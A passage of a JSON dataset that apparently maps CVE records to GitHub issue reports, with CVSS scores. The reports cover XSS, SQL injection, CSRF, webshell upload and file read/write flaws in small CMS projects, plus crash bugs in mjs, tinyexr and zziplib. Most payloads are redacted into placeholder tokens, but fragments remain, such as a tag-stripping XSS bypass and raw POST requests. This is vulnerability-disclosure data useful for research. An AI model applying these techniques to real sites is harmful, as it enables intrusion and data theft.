        "description": "APITAG There are two xss vulnerabilities in APITAG NUMBERTAG FILETAG , parameter $cfg_copyright. Demo: Login in administrator panel and insert payload as follows: FILETAG Save it and you can see in data package. FILETAG Then,visit index page FILETAG view source: FILETAG NUMBERTAG FILETAG , parameter $cfg_switchshow. Demo: Login in administrator panel and insert payload as follows:(It's necessary to close site.) FILETAG Save it and you can see in data package. FILETAG Visit index page. FILETAG view source: FILETAG Fix: Filter the $cfg_copyright and $cfg_switchshow with function APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-18259",
        "Issue_Url_old": "https://github.com/chilin89117/ED01-CMS/issues/1",
        "Issue_Url_new": "https://github.com/chilin89117/ed01-cms/issues/1",
        "Repo_new": "chilin89117/ED01-CMS",
        "Issue_Created_At": "2019-06-13T01:37:59Z",
        "description": "Two xss vulnerabilities NUMBERTAG There is a reflective xss on the search page FILETAG . Poc: APITAG FILETAG NUMBERTAG In the background, you can enter the stored xss by writing an APITAG poc in Posts APITAG Content or Post Title: APITAG Post status select Publish,when entering the home page,xss will be triggered. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18261",
        "Issue_Url_old": "https://github.com/chilin89117/ED01-CMS/issues/2",
        "Issue_Url_new": "https://github.com/chilin89117/ed01-cms/issues/2",
        "Repo_new": "chilin89117/ED01-CMS",
        "Issue_Created_At": "2019-06-13T02:17:19Z",
        "description": "File upload APITAG can be uploaded and trigger remote command execution. When writing an article in the background\uff0cyou can upload a webshell via file upload vulnerability in the image upload. Poc: APITAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18262",
        "Issue_Url_old": "https://github.com/chilin89117/ED01-CMS/issues/3",
        "Issue_Url_new": "https://github.com/chilin89117/ed01-cms/issues/3",
        "Repo_new": "chilin89117/ED01-CMS",
        "Issue_Created_At": "2019-06-13T02:29:06Z",
        "description": "There is a SQL injection vulnerability in the page FILETAG . When you click categories, the website interacts with the database via the FILETAG page cid parameter, where there is a SQL injection APITAG can enter the database through sqlmap. APITAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18263",
        "Issue_Url_old": "https://github.com/harshitbansal373/PHP-CMS/issues/1",
        "Issue_Url_new": "https://github.com/harshitbansal373/php-cms/issues/1",
        "Repo_new": "harshitbansal373/php-cms",
        "Issue_Created_At": "2019-06-14T09:29:32Z",
        "description": "SQL injection vulnerability in FILETAG . In APITAG a SQL injection vulnerability in APITAG parameter is transmitted using POST,you can use sqlmap to enter the database. CODETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18265",
        "Issue_Url_old": "https://github.com/github123abc123/bird/issues/1",
        "Issue_Url_new": "https://github.com/github123abc123/bird/issues/1",
        "Repo_new": "github123abc123/bird",
        "Issue_Created_At": "2019-02-26T02:01:49Z",
        "description": "One CSRF vulnerability in Simple Log NUMBERTAG An issue was discovered in Simple Log NUMBERTAG There is a CSRF vulnerability that can add Administrator Account in the ' APITAG Add Administrator Account Poc\uff1a Create account\uff1atest3 password:a NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18268",
        "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/209",
        "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/209",
        "Repo_new": "zblogcn/zblogphp",
        "Issue_Created_At": "2019-02-19T07:18:24Z",
        "description": "\u91cd\u5b9a\u5411\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG APITAG NUMBERTAG get\u53c2\u6570redirect\u5e76\u7528\u4f5c\u91cd\u5b9a\u5411\u7684\u8def\u5f84 FILETAG PATHTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18268",
        "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/216",
        "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/216",
        "Repo_new": "zblogcn/zblogphp",
        "Issue_Created_At": "2019-04-04T06:05:11Z",
        "description": "Z APITAG NUMBERTAG Open redirect vulnerability. Z APITAG NUMBERTAG has an Open Redirect via the FILETAG redirect parameter. Open Redirection vulnerability Technical details: URL : FILETAG Parameter Name : redirect Parameter Type : GET Attack Pattern : FILETAG Should there be anything else we can help you with, please do not hesitate to ask.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18392",
        "Issue_Url_old": "https://github.com/cesanta/mjs/issues/106",
        "Issue_Url_new": "https://github.com/cesanta/mjs/issues/106",
        "Repo_new": "cesanta/mjs",
        "Issue_Created_At": "2018-07-03T06:21:09Z",
        "description": "APITAG stack overflow at APITAG POCs: FILETAG FILETAG ASAN output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-18428",
        "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/109",
        "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/109",
        "Repo_new": "syoyo/tinyexr",
        "Issue_Created_At": "2019-03-05T02:30:27Z",
        "description": "Out of range in function APITAG APITAG I build tinyexr with clang and address sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a out of range has triggered. (gdb) bt NUMBERTAG GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff6aba NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ffff7ad NUMBERTAG b7 in ?? () from PATHTAG NUMBERTAG ffff7adea NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff7adea NUMBERTAG in APITAG () from PATHTAG NUMBERTAG ffff7adec NUMBERTAG in __cxa_throw () from PATHTAG NUMBERTAG ffff7ada7b5 in ?? () from PATHTAG NUMBERTAG df NUMBERTAG in std::vector<float, std::allocator APITAG >::_M_range_check (this=<optimized out>, __n NUMBERTAG at PATHTAG NUMBERTAG std::vector<float, std::allocator APITAG >::at (this=<optimized out>, __n NUMBERTAG at PATHTAG NUMBERTAG APITAG (data=<optimized out>, width NUMBERTAG height NUMBERTAG components NUMBERTAG save_as_fp NUMBERTAG outfilename NUMBERTAG f NUMBERTAG e0 APITAG APITAG err=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG c in main (argc=<optimized out>, argv=<optimized out>) at APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18430",
        "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/108",
        "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/108",
        "Repo_new": "syoyo/tinyexr",
        "Issue_Created_At": "2019-03-05T02:30:06Z",
        "description": "Out of memory in function APITAG APITAG I build tinyexr with clang and address sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a out of memory has triggered NUMBERTAG ERROR: APITAG allocator is out of memory trying to allocate NUMBERTAG f NUMBERTAG b NUMBERTAG bytes NUMBERTAG f2bb2 in operator new(unsigned long) ( PATHTAG NUMBERTAG a in APITAG long>::allocate(unsigned long, void const ) PATHTAG NUMBERTAG a in APITAG long> APITAG long>&, unsigned long) PATHTAG NUMBERTAG a in APITAG long, std::allocator<unsigned long> >::_M_allocate(unsigned long) PATHTAG NUMBERTAG a in APITAG long, std::allocator<unsigned long> >::_M_create_storage(unsigned long) PATHTAG NUMBERTAG a in APITAG long, std::allocator<unsigned long> APITAG long, std::allocator<unsigned long> const&) PATHTAG NUMBERTAG a in std::vector<unsigned long, std::allocator<unsigned long> >::vector(unsigned long, std::allocator<unsigned long> const&) PATHTAG NUMBERTAG a in APITAG , APITAG const , unsigned char const , unsigned char const , unsigned long, char const ) PATHTAG NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG e in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG ee NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG fb NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG HINT: if you don't care about these errors you may set allocator_may_return_null NUMBERTAG SUMMARY: APITAG out of memory ( PATHTAG ) in operator new(unsigned long NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18438",
        "Issue_Url_old": "https://github.com/qinggan/phpok/issues/4",
        "Issue_Url_new": "https://github.com/qinggan/phpok/issues/4",
        "Repo_new": "qinggan/phpok",
        "Issue_Created_At": "2019-03-06T06:25:51Z",
        "description": "phpok NUMBERTAG have Some Vulnerability. Variable Overwrite Vulnerability from the Entrance of framework\uff0ci discovered APITAG variable overwrite in APITAG APITAG APITAG we could watch APITAG parameter in APITAG \uff1a APITAG APITAG payload\uff1a APITAG APITAG APITAG Vulnerability to read arbitrary files APITAG APITAG back to the: PATHTAG APITAG APITAG PATHTAG APITAG APITAG there is two file have this vulnerability: payload1: APITAG payload2: APITAG APITAG APITAG APITAG APITAG Arbitrary File Writing to getshell APITAG function In APITAG NUMBERTAG line APITAG APITAG payload: APITAG APITAG APITAG Arbitrary file delete Vulnerability PATHTAG NUMBERTAG APITAG \u51fd\u6570\uff1a APITAG APITAG payload: APITAG APITAG APITAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-18442",
        "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/68",
        "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/68",
        "Repo_new": "gdraheim/zziplib",
        "Issue_Created_At": "2019-03-05T16:45:19Z",
        "description": "error: Incorrect handling of function 'zzip_fread' return value. Hello, I found a bug of zziplib on the lastest commit b NUMBERTAG bc. It's in the function unzzip_cat_file (unzzipcat APITAG , and it is caused by incorrect handling of the return value of the function \u2018zzip_fread\u2019. Relevant code in function unzzip_cat_file in unzzipcat zip.c: ERRORTAG FILETAG Using the POC file, I find that the function zzip_file_read returns NUMBERTAG And it is handled incorrectly in the caller (unzzip_cat_file), which leads to an infinite loop. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-18445",
        "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/8",
        "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/8",
        "Repo_new": "doublefast/yunucms",
        "Issue_Created_At": "2019-03-06T08:10:47Z",
        "description": "APITAG Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" URLTAG \" In the PATHTAG No filtering to id in the upurl( ) function: FILETAG Steps To Reproduce: Open below URL in browser which supports flash. url: URLTAG FILETAG Fix: Filter the url parameter",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-18446",
        "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/9",
        "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/9",
        "Repo_new": "doublefast/yunucms",
        "Issue_Created_At": "2019-03-07T05:39:20Z",
        "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" URLTAG \" In the PATHTAG filtering to param in the APITAG ) function: FILETAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG content FILETAG APITAG refresh vulnerability trigger point FILETAG Fix: Filter the param parameter",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-18451",
        "Issue_Url_old": "https://github.com/AutismJH/damicms/issues/2",
        "Issue_Url_new": "https://github.com/autismjh/damicms/issues/2",
        "Repo_new": "autismjh/damicms",
        "Issue_Created_At": "2019-03-13T02:09:44Z",
        "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" In the PATHTAG No filtering to title in the APITAG function: FILETAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG APITAG content FILETAG FILETAG APITAG refresh vulnerability trigger point FILETAG Fix: Filter the title parameter.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-18454",
        "Issue_Url_old": "https://github.com/hillerlin/bycms/issues/1",
        "Issue_Url_new": "https://github.com/hillerlin/bycms/issues/1",
        "Repo_new": "hillerlin/bycms",
        "Issue_Created_At": "2019-03-13T09:08:37Z",
        "description": "Bug NUMBERTAG Cross site request forgery. There is an Stored Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: FILETAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG APITAG the package to generate a POC file and run it FILETAG FILETAG APITAG page has changed FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.9,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2020-18455",
        "Issue_Url_old": "https://github.com/hillerlin/bycms/issues/2",
        "Issue_Url_new": "https://github.com/hillerlin/bycms/issues/2",
        "Repo_new": "hillerlin/bycms",
        "Issue_Created_At": "2019-03-21T06:55:11Z",
        "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" In the PATHTAG No filtering to title in the edit( ) function: FILETAG Vulnerability trigger point FILETAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG FILETAG APITAG content FILETAG APITAG the refresh vulnerability trigger point FILETAG Fix: Filter the title parameter",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-18456",
        "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/4",
        "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/4",
        "Repo_new": "pbootcms/pbootcms",
        "Issue_Created_At": "2019-04-09T01:42:25Z",
        "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" In the PATHTAG No filtering to title in the mod( ) function: FILETAG FILETAG Vulnerability trigger point\uff1a URLTAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG NUMBERTAG modify content FILETAG FILETAG APITAG refresh vulnerability trigger point FILETAG Fix: Filter the title parameter",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-18457",
        "Issue_Url_old": "https://github.com/hillerlin/bycms/issues/3",
        "Issue_Url_new": "https://github.com/hillerlin/bycms/issues/3",
        "Repo_new": "hillerlin/bycms",
        "Issue_Created_At": "2019-04-10T02:43:41Z",
        "description": "Bug NUMBERTAG Cross site request forgery. There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: FILETAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG the package to generate a POC file and run it FILETAG FILETAG FILETAG APITAG page has changed FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.9,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2020-18458",
        "Issue_Url_old": "https://github.com/AutismJH/damicms/issues/5",
        "Issue_Url_new": "https://github.com/autismjh/damicms/issues/5",
        "Repo_new": "autismjh/damicms",
        "Issue_Created_At": "2019-04-15T08:36:56Z",
        "description": "Bug NUMBERTAG Cross site request forgery. There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG the package to generate a POC file and run it FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.0,
        "impactScore": 5.9,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2020-18462",
        "Issue_Url_old": "https://github.com/Richard1266/aikcms/issues/1",
        "Issue_Url_new": "https://github.com/richard1266/aikcms/issues/1",
        "Repo_new": "richard1266/aikcms",
        "Issue_Created_At": "2019-04-29T06:40:30Z",
        "description": "Bug NUMBERTAG File upload vulnerability. There is an File upload vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" In the PATHTAG checksum filtering of file extensions of uploaded files\uff1a FILETAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG and capture the change suffix name FILETAG FILETAG FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-18463",
        "Issue_Url_old": "https://github.com/Richard1266/aikcms/issues/2",
        "Issue_Url_new": "https://github.com/richard1266/aikcms/issues/2",
        "Repo_new": "richard1266/aikcms",
        "Issue_Created_At": "2019-04-29T07:07:17Z",
        "description": "Bug NUMBERTAG Cross site request forgery. There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: FILETAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG APITAG the package to generate a POC file and run it FILETAG FILETAG FILETAG APITAG page has changed FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N",
        "severity": "LOW",
        "baseScore": 2.4,
        "impactScore": 1.4,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2020-18467",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/364",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/364",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2019-04-09T10:02:27Z",
        "description": "APITAG CMS NUMBERTAG There is a a Stored XSS which can allows remote attackers to inject arbitrary code. APITAG CMS version NUMBERTAG suffers from a cross site scripting vulnerability. After the administrator logged in, Add Tag which can allows remote attackers to inject arbitrary code NUMBERTAG poc: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG bigtree_admin FILETAG NUMBERTAG when administrator access Tags FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-18468",
        "Issue_Url_old": "https://github.com/joelister/Persistent-XSS-on-qdPM-9.1/issues/2",
        "Issue_Url_new": "https://github.com/joelister/persistent-xss-on-qdpm-9.1/issues/2",
        "Repo_new": "joelister/persistent-xss-on-qdpm-9.1",
        "Issue_Created_At": "2019-04-12T07:54:24Z",
        "description": "Persistent XSS on APITAG NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG field found in the APITAG Page\" page under the APITAG menu in APITAG NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG pt>alert NUMBERTAG APITAG // Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG APITAG administrator loggin POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"type\" login NUMBERTAG Content Disposition: form data; name=\"cfg FILETAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-18469",
        "Issue_Url_old": "https://github.com/joelister/Persistent-XSS-on-qdPM-9.1/issues/3",
        "Issue_Url_new": "https://github.com/joelister/persistent-xss-on-qdpm-9.1/issues/3",
        "Repo_new": "joelister/persistent-xss-on-qdpm-9.1",
        "Issue_Created_At": "2019-04-12T09:34:42Z",
        "description": "Persistent XSS on Rukovoditel NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG of application\" field found in the APITAG Configuration\" page in Rukovoditel NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG of application\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG pt>alert NUMBERTAG APITAG // Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG When an unauthenticated user visits the page, the code gets executed: FILETAG NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG Text\" field found in the APITAG page under the APITAG menu in Rukovoditel NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG Text\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"form_session_token\" APITAG NUMBERTAG Content Disposition: form data; name=\"CFG FILETAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-18469",
        "Issue_Url_old": "https://github.com/joelister/Persistent-XSS-on-qdPM-9.1/issues/5",
        "Issue_Url_new": "https://github.com/joelister/persistent-xss-on-qdpm-9.1/issues/5",
        "Repo_new": "joelister/persistent-xss-on-qdpm-9.1",
        "Issue_Created_At": "2019-04-12T14:40:19Z",
        "description": "Persistent XSS on Rukovoditel NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG Text\" field found in the APITAG page under the APITAG menu in Rukovoditel NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG Text\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"form_session_token\" APITAG NUMBERTAG Content Disposition: form data; name=\"CFG FILETAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-18470",
        "Issue_Url_old": "https://github.com/joelister/Persistent-XSS-on-qdPM-9.1/issues/4",
        "Issue_Url_new": "https://github.com/joelister/persistent-xss-on-qdpm-9.1/issues/4",
        "Repo_new": "joelister/persistent-xss-on-qdpm-9.1",
        "Issue_Created_At": "2019-04-12T14:32:58Z",
